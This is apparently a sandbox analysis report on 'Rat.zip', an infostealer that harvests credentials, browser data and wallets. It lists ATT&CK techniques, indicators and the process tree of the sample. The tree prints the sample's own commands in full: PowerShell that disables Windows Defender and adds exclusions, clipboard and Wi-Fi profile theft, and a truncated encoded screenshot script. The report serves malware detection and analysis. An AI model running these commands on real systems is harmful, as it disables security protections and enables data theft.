612394c6622beb5ff15677d86a6d181c1925f11c28f6ab442d6aedc552b87794

Analysis

max time kernel
518s
max time network
452s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
24-12-2024 21:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Rat.zip
Size

7.2MB
MD5

1db232e23cae8e66ad2b535845c55983
SHA1

2ac359ebbc5e3176208807698dd45086fabc71e4
SHA256

612394c6622beb5ff15677d86a6d181c1925f11c28f6ab442d6aedc552b87794
SHA512

c7064d39638eb4ae2655e87b29b69e55f822b5d96a1de5e996bfe3698ce73088b4ef3ff1976009da467af015c8ed0ef7b0caf9ca8d264ad5f0fcc8c85bf498b7
SSDEEP

196608:hHSEbSlprebj2fPAtKIF08k+yNBvzHXzvgJO:hy8Exef2HuzI+y3HjgJO

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3484	powershell.exe
628	powershell.exe
2964	powershell.exe
2992	powershell.exe
4608	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Built.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2712	cmd.exe
3208	powershell.exe

Executes dropped EXE 3 IoCs

pid	Process
4276	Built.exe
4212	Built.exe
4872	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
4212	Built.exe
4212	Built.exe
4212	Built.exe
4212	Built.exe
4212	Built.exe
4212	Built.exe
4212	Built.exe
4212	Built.exe
4212	Built.exe
4212	Built.exe
4212	Built.exe
4212	Built.exe
4212	Built.exe
4212	Built.exe
4212	Built.exe
4212	Built.exe
4212	Built.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
2	discord.com
7	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
3	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
2460	tasklist.exe
2512	tasklist.exe
5056	tasklist.exe
1456	tasklist.exe
2648	tasklist.exe

UPX packed file 60 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001c00000002aaff-26.dat	upx
behavioral1/memory/4212-30-0x00007FFF1FB10000-0x00007FFF200F9000-memory.dmp	upx
behavioral1/files/0x001900000002aaec-32.dat	upx
behavioral1/files/0x001900000002aafb-36.dat	upx
behavioral1/memory/4212-53-0x00007FFF29290000-0x00007FFF2929F000-memory.dmp	upx
behavioral1/files/0x001900000002aaf5-52.dat	upx
behavioral1/files/0x001900000002aaf4-51.dat	upx
behavioral1/files/0x001c00000002aaf3-50.dat	upx
behavioral1/files/0x001900000002aaf2-49.dat	upx
behavioral1/files/0x001900000002aaef-48.dat	upx
behavioral1/files/0x001900000002aaee-47.dat	upx
behavioral1/files/0x001c00000002aaed-46.dat	upx
behavioral1/files/0x001900000002aae9-45.dat	upx
behavioral1/files/0x001900000002ab06-44.dat	upx
behavioral1/files/0x001c00000002ab05-43.dat	upx
behavioral1/files/0x001900000002ab04-42.dat	upx
behavioral1/files/0x001900000002aafe-39.dat	upx
behavioral1/files/0x001900000002aafa-38.dat	upx
behavioral1/memory/4212-35-0x00007FFF24570000-0x00007FFF24593000-memory.dmp	upx
behavioral1/memory/4212-59-0x00007FFF20810000-0x00007FFF2083D000-memory.dmp	upx
behavioral1/memory/4212-61-0x00007FFF23690000-0x00007FFF236A9000-memory.dmp	upx
behavioral1/memory/4212-63-0x00007FFF20580000-0x00007FFF205A3000-memory.dmp	upx
behavioral1/memory/4212-65-0x00007FFF1C220000-0x00007FFF1C397000-memory.dmp	upx
behavioral1/memory/4212-69-0x00007FFF24760000-0x00007FFF2476D000-memory.dmp	upx
behavioral1/memory/4212-67-0x00007FFF20BB0000-0x00007FFF20BC9000-memory.dmp	upx
behavioral1/memory/4212-71-0x00007FFF20540000-0x00007FFF20573000-memory.dmp	upx
behavioral1/memory/4212-76-0x00007FFF1FA40000-0x00007FFF1FB0D000-memory.dmp	upx
behavioral1/memory/4212-75-0x00007FFF1FB10000-0x00007FFF200F9000-memory.dmp	upx
behavioral1/memory/4212-79-0x00007FFF24570000-0x00007FFF24593000-memory.dmp	upx
behavioral1/memory/4212-77-0x00007FFF0ECC0000-0x00007FFF0F1E2000-memory.dmp	upx
behavioral1/memory/4212-81-0x00007FFF207F0000-0x00007FFF20804000-memory.dmp	upx
behavioral1/memory/4212-84-0x00007FFF23BE0000-0x00007FFF23BED000-memory.dmp	upx
behavioral1/memory/4212-83-0x00007FFF20810000-0x00007FFF2083D000-memory.dmp	upx
behavioral1/memory/4212-86-0x00007FFF23690000-0x00007FFF236A9000-memory.dmp	upx
behavioral1/memory/4212-87-0x00007FFF1C100000-0x00007FFF1C21C000-memory.dmp	upx
behavioral1/memory/4212-111-0x00007FFF20580000-0x00007FFF205A3000-memory.dmp	upx
behavioral1/memory/4212-114-0x00007FFF1C220000-0x00007FFF1C397000-memory.dmp	upx
behavioral1/memory/4212-190-0x00007FFF20BB0000-0x00007FFF20BC9000-memory.dmp	upx
behavioral1/memory/4212-273-0x00007FFF20540000-0x00007FFF20573000-memory.dmp	upx
behavioral1/memory/4212-276-0x00007FFF1FA40000-0x00007FFF1FB0D000-memory.dmp	upx
behavioral1/memory/4212-277-0x00007FFF0ECC0000-0x00007FFF0F1E2000-memory.dmp	upx
behavioral1/memory/4212-299-0x00007FFF207F0000-0x00007FFF20804000-memory.dmp	upx
behavioral1/memory/4212-309-0x00007FFF1FB10000-0x00007FFF200F9000-memory.dmp	upx
behavioral1/memory/4212-315-0x00007FFF1C220000-0x00007FFF1C397000-memory.dmp	upx
behavioral1/memory/4212-310-0x00007FFF24570000-0x00007FFF24593000-memory.dmp	upx
behavioral1/memory/4212-340-0x00007FFF29290000-0x00007FFF2929F000-memory.dmp	upx
behavioral1/memory/4212-348-0x00007FFF1FA40000-0x00007FFF1FB0D000-memory.dmp	upx
behavioral1/memory/4212-352-0x00007FFF1C100000-0x00007FFF1C21C000-memory.dmp	upx
behavioral1/memory/4212-351-0x00007FFF23BE0000-0x00007FFF23BED000-memory.dmp	upx
behavioral1/memory/4212-350-0x00007FFF207F0000-0x00007FFF20804000-memory.dmp	upx
behavioral1/memory/4212-349-0x00007FFF0ECC0000-0x00007FFF0F1E2000-memory.dmp	upx
behavioral1/memory/4212-347-0x00007FFF20540000-0x00007FFF20573000-memory.dmp	upx
behavioral1/memory/4212-346-0x00007FFF24760000-0x00007FFF2476D000-memory.dmp	upx
behavioral1/memory/4212-345-0x00007FFF20BB0000-0x00007FFF20BC9000-memory.dmp	upx
behavioral1/memory/4212-344-0x00007FFF1C220000-0x00007FFF1C397000-memory.dmp	upx
behavioral1/memory/4212-343-0x00007FFF20580000-0x00007FFF205A3000-memory.dmp	upx
behavioral1/memory/4212-342-0x00007FFF23690000-0x00007FFF236A9000-memory.dmp	upx
behavioral1/memory/4212-341-0x00007FFF20810000-0x00007FFF2083D000-memory.dmp	upx
behavioral1/memory/4212-339-0x00007FFF24570000-0x00007FFF24593000-memory.dmp	upx
behavioral1/memory/4212-324-0x00007FFF1FB10000-0x00007FFF200F9000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3508	cmd.exe
1504	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3104	WMIC.exe
3524	WMIC.exe
3868	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4032	systeminfo.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	7zFM.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	7zFM.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
628	powershell.exe
2964	powershell.exe
2964	powershell.exe
628	powershell.exe
3484	powershell.exe
3484	powershell.exe
3208	powershell.exe
3208	powershell.exe
1308	powershell.exe
1308	powershell.exe
3208	powershell.exe
1308	powershell.exe
2992	powershell.exe
2992	powershell.exe
3376	powershell.exe
3376	powershell.exe
4608	powershell.exe
4608	powershell.exe
4512	powershell.exe
4512	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4384	7zFM.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	4384	7zFM.exe
Token: 35	4384	7zFM.exe
Token: SeSecurityPrivilege	4384	7zFM.exe
Token: SeDebugPrivilege	2460	tasklist.exe
Token: SeDebugPrivilege	628	powershell.exe
Token: SeDebugPrivilege	2964	powershell.exe
Token: SeIncreaseQuotaPrivilege	2004	WMIC.exe
Token: SeSecurityPrivilege	2004	WMIC.exe
Token: SeTakeOwnershipPrivilege	2004	WMIC.exe
Token: SeLoadDriverPrivilege	2004	WMIC.exe
Token: SeSystemProfilePrivilege	2004	WMIC.exe
Token: SeSystemtimePrivilege	2004	WMIC.exe
Token: SeProfSingleProcessPrivilege	2004	WMIC.exe
Token: SeIncBasePriorityPrivilege	2004	WMIC.exe
Token: SeCreatePagefilePrivilege	2004	WMIC.exe
Token: SeBackupPrivilege	2004	WMIC.exe
Token: SeRestorePrivilege	2004	WMIC.exe
Token: SeShutdownPrivilege	2004	WMIC.exe
Token: SeDebugPrivilege	2004	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2004	WMIC.exe
Token: SeRemoteShutdownPrivilege	2004	WMIC.exe
Token: SeUndockPrivilege	2004	WMIC.exe
Token: SeManageVolumePrivilege	2004	WMIC.exe
Token: 33	2004	WMIC.exe
Token: 34	2004	WMIC.exe
Token: 35	2004	WMIC.exe
Token: 36	2004	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2004	WMIC.exe
Token: SeSecurityPrivilege	2004	WMIC.exe
Token: SeTakeOwnershipPrivilege	2004	WMIC.exe
Token: SeLoadDriverPrivilege	2004	WMIC.exe
Token: SeSystemProfilePrivilege	2004	WMIC.exe
Token: SeSystemtimePrivilege	2004	WMIC.exe
Token: SeProfSingleProcessPrivilege	2004	WMIC.exe
Token: SeIncBasePriorityPrivilege	2004	WMIC.exe
Token: SeCreatePagefilePrivilege	2004	WMIC.exe
Token: SeBackupPrivilege	2004	WMIC.exe
Token: SeRestorePrivilege	2004	WMIC.exe
Token: SeShutdownPrivilege	2004	WMIC.exe
Token: SeDebugPrivilege	2004	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2004	WMIC.exe
Token: SeRemoteShutdownPrivilege	2004	WMIC.exe
Token: SeUndockPrivilege	2004	WMIC.exe
Token: SeManageVolumePrivilege	2004	WMIC.exe
Token: 33	2004	WMIC.exe
Token: 34	2004	WMIC.exe
Token: 35	2004	WMIC.exe
Token: 36	2004	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3524	WMIC.exe
Token: SeSecurityPrivilege	3524	WMIC.exe
Token: SeTakeOwnershipPrivilege	3524	WMIC.exe
Token: SeLoadDriverPrivilege	3524	WMIC.exe
Token: SeSystemProfilePrivilege	3524	WMIC.exe
Token: SeSystemtimePrivilege	3524	WMIC.exe
Token: SeProfSingleProcessPrivilege	3524	WMIC.exe
Token: SeIncBasePriorityPrivilege	3524	WMIC.exe
Token: SeCreatePagefilePrivilege	3524	WMIC.exe
Token: SeBackupPrivilege	3524	WMIC.exe
Token: SeRestorePrivilege	3524	WMIC.exe
Token: SeShutdownPrivilege	3524	WMIC.exe
Token: SeDebugPrivilege	3524	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3524	WMIC.exe
Token: SeRemoteShutdownPrivilege	3524	WMIC.exe
Token: SeUndockPrivilege	3524	WMIC.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
4384	7zFM.exe
4384	7zFM.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4276 wrote to memory of 4212	4276	Built.exe	82
PID 4276 wrote to memory of 4212	4276	Built.exe	82
PID 4212 wrote to memory of 2892	4212	Built.exe	83
PID 4212 wrote to memory of 2892	4212	Built.exe	83
PID 4212 wrote to memory of 2044	4212	Built.exe	84
PID 4212 wrote to memory of 2044	4212	Built.exe	84
PID 4212 wrote to memory of 1320	4212	Built.exe	86
PID 4212 wrote to memory of 1320	4212	Built.exe	86
PID 4212 wrote to memory of 1696	4212	Built.exe	89
PID 4212 wrote to memory of 1696	4212	Built.exe	89
PID 2892 wrote to memory of 628	2892	cmd.exe	91
PID 2892 wrote to memory of 628	2892	cmd.exe	91
PID 2044 wrote to memory of 2964	2044	cmd.exe	93
PID 2044 wrote to memory of 2964	2044	cmd.exe	93
PID 1696 wrote to memory of 2460	1696	cmd.exe	92
PID 1696 wrote to memory of 2460	1696	cmd.exe	92
PID 1320 wrote to memory of 1096	1320	cmd.exe	94
PID 1320 wrote to memory of 1096	1320	cmd.exe	94
PID 4212 wrote to memory of 1312	4212	Built.exe	96
PID 4212 wrote to memory of 1312	4212	Built.exe	96
PID 1312 wrote to memory of 2004	1312	cmd.exe	98
PID 1312 wrote to memory of 2004	1312	cmd.exe	98
PID 4212 wrote to memory of 3020	4212	Built.exe	99
PID 4212 wrote to memory of 3020	4212	Built.exe	99
PID 3020 wrote to memory of 436	3020	cmd.exe	101
PID 3020 wrote to memory of 436	3020	cmd.exe	101
PID 4212 wrote to memory of 392	4212	Built.exe	102
PID 4212 wrote to memory of 392	4212	Built.exe	102
PID 392 wrote to memory of 4380	392	cmd.exe	104
PID 392 wrote to memory of 4380	392	cmd.exe	104
PID 4212 wrote to memory of 4884	4212	Built.exe	105
PID 4212 wrote to memory of 4884	4212	Built.exe	105
PID 4884 wrote to memory of 3524	4884	cmd.exe	107
PID 4884 wrote to memory of 3524	4884	cmd.exe	107
PID 4212 wrote to memory of 2164	4212	Built.exe	108
PID 4212 wrote to memory of 2164	4212	Built.exe	108
PID 2164 wrote to memory of 3868	2164	cmd.exe	110
PID 2164 wrote to memory of 3868	2164	cmd.exe	110
PID 4212 wrote to memory of 3172	4212	Built.exe	111
PID 4212 wrote to memory of 3172	4212	Built.exe	111
PID 3172 wrote to memory of 3484	3172	cmd.exe	113
PID 3172 wrote to memory of 3484	3172	cmd.exe	113
PID 4212 wrote to memory of 468	4212	Built.exe	114
PID 4212 wrote to memory of 468	4212	Built.exe	114
PID 4212 wrote to memory of 4608	4212	Built.exe	116
PID 4212 wrote to memory of 4608	4212	Built.exe	116
PID 4608 wrote to memory of 2512	4608	cmd.exe	118
PID 4608 wrote to memory of 2512	4608	cmd.exe	118
PID 468 wrote to memory of 5056	468	cmd.exe	119
PID 468 wrote to memory of 5056	468	cmd.exe	119
PID 4212 wrote to memory of 756	4212	Built.exe	120
PID 4212 wrote to memory of 756	4212	Built.exe	120
PID 4212 wrote to memory of 2712	4212	Built.exe	121
PID 4212 wrote to memory of 2712	4212	Built.exe	121
PID 4212 wrote to memory of 2108	4212	Built.exe	124
PID 4212 wrote to memory of 2108	4212	Built.exe	124
PID 756 wrote to memory of 4724	756	cmd.exe	125
PID 756 wrote to memory of 4724	756	cmd.exe	125
PID 2712 wrote to memory of 3208	2712	cmd.exe	126
PID 2712 wrote to memory of 3208	2712	cmd.exe	126
PID 4212 wrote to memory of 4460	4212	Built.exe	127
PID 4212 wrote to memory of 4460	4212	Built.exe	127
PID 4212 wrote to memory of 3508	4212	Built.exe	129
PID 4212 wrote to memory of 3508	4212	Built.exe	129

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4992	attrib.exe
1052	attrib.exe

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Rat.zip"
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4384

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:128

C:\Users\Admin\Desktop\Rat\Built.exe
"C:\Users\Admin\Desktop\Rat\Built.exe"
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4276
- C:\Users\Admin\Desktop\Rat\Built.exe
  "C:\Users\Admin\Desktop\Rat\Built.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Rat\Built.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2892
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Rat\Built.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2044
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please Restart.', 0, 'Error!', 32+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1320
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please Restart.', 0, 'Error!', 32+16);close()"
      4⤵
      PID:1096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1696
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1312
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3020
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:392
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:4380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4884
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:3524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2164
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3172
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:468
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:5056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4608
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:756
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:4724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:2712
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:3208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2108
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4460
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:3508
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:1504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:2304
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:4224
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:4380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAA